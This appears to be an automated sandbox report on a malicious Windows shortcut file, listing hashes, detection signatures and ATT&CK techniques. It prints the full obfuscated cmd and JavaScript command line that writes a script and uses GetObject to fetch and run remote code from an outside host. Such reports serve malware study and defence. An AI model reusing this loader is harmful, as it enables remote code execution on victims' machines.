6ff069df0998db6be5e4e09bfeba878eda2192141d4ed66a67737f4629cce21f

Analysis

max time kernel
108s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
20/04/2023, 07:30

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

normaescolapaulofreire.com05839098.637350.88866.lNk.lnk
Size

993B
MD5

58ddaf977e23a1b3305cbaa958f2f8c7
SHA1

9b59e71b9003a5d3335371007253ffbc310043d1
SHA256

6ff069df0998db6be5e4e09bfeba878eda2192141d4ed66a67737f4629cce21f
SHA512

e1f73ecf37dd6938b72cd6a4f3e320cabe2b6e9856c6e2abcb4dce4e8e062ebb2eeda8b57549e674a16509c35971713e875e2c87a070ffe7372f53f0af0afde8

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	3124	WScript.exe
16	3124	WScript.exe
17	3124	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings	cmd.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2768	conhost.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3772 wrote to memory of 2768	3772	cmd.exe	85
PID 3772 wrote to memory of 2768	3772	cmd.exe	85
PID 2768 wrote to memory of 4032	2768	conhost.exe	86
PID 2768 wrote to memory of 4032	2768	conhost.exe	86
PID 4032 wrote to memory of 3124	4032	cmd.exe	87
PID 4032 wrote to memory of 3124	4032	cmd.exe	87

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\normaescolapaulofreire.com05839098.637350.88866.lNk.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3772
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\eM5DWVR\>nul 2>&1 &&s^eT RHTK=C:\eM5DWVR\^eM5DWVR.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0039\u004d\u0061\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0039\u004d\u0061\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0039\u004d\u0061\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0039\u004d\u0061\u002b\u0044\u0039\u004d\u0061\u002b\u0045\u0039\u004d\u0061\u002b\u0022\u002f\u002f\u006c\u0032\u006f\u0075\u006d\u0063\u002e\u0062\u0065\u006c\u0064\u0073\u0065\u007a\u0061\u0073\u002e\u0062\u0065\u0061\u0075\u0074\u0079\u002f\u003f\u0032\u002f\u0022\u0029\u003b'); >!RHTK!&&ca^ll !RHTK!"
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /V/D/c "md C:\eM5DWVR\>nul 2>&1 &&s^eT RHTK=C:\eM5DWVR\^eM5DWVR.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0039\u004d\u0061\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0039\u004d\u0061\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0039\u004d\u0061\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0039\u004d\u0061\u002b\u0044\u0039\u004d\u0061\u002b\u0045\u0039\u004d\u0061\u002b\u0022\u002f\u002f\u006c\u0032\u006f\u0075\u006d\u0063\u002e\u0062\u0065\u006c\u0064\u0073\u0065\u007a\u0061\u0073\u002e\u0062\u0065\u0061\u0075\u0074\u0079\u002f\u003f\u0032\u002f\u0022\u0029\u003b'); >!RHTK!&&ca^ll !RHTK!"
    3⤵
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4032
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\eM5DWVR\eM5DWVR.Js"
      4⤵
      Blocklisted process makes network request
      PID:3124

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\normaescolapaulofreire.com05839098.637350.88866.lNk.lnk

Filesize
2KB

MD5
256eaeb8416fac3624d09388092d674f

SHA1
6d70a064e0bcefc7344cffda8ff214b5810839ee

SHA256
b6ae7fedf44aebe737f584449d598798ab1ad32bb61adb2bbc97d90807504851

SHA512
50a6cd6029fd36d868ef94ccbc872df3c3b3672fe94659c55e21319f80fd076cc2bcb75109404ff8e6275f17d69a034c76244db37bbd1ed45ba59b595bf627ee

Download Submit
C:\eM5DWVR\eM5DWVR.Js

Filesize
654B

MD5
0be809d04ebde8e7cdee391d13d3544a

SHA1
77972c142ff348ef282a5a6e3157f467876ae17d

SHA256
2835be3842fa39ce58bef882ea7c8d01e0f3c2c0f6ed8df75f7fb3be2dd47152

SHA512
84b17e41807fc0a66753c8e527c3f878c847b9fbbe638f3ab5c85bf2e7d967cbdac26af5e2febeeb17df7c3797c42a1622d69d59fdbd442010ac0ff6e9854103

Download Submit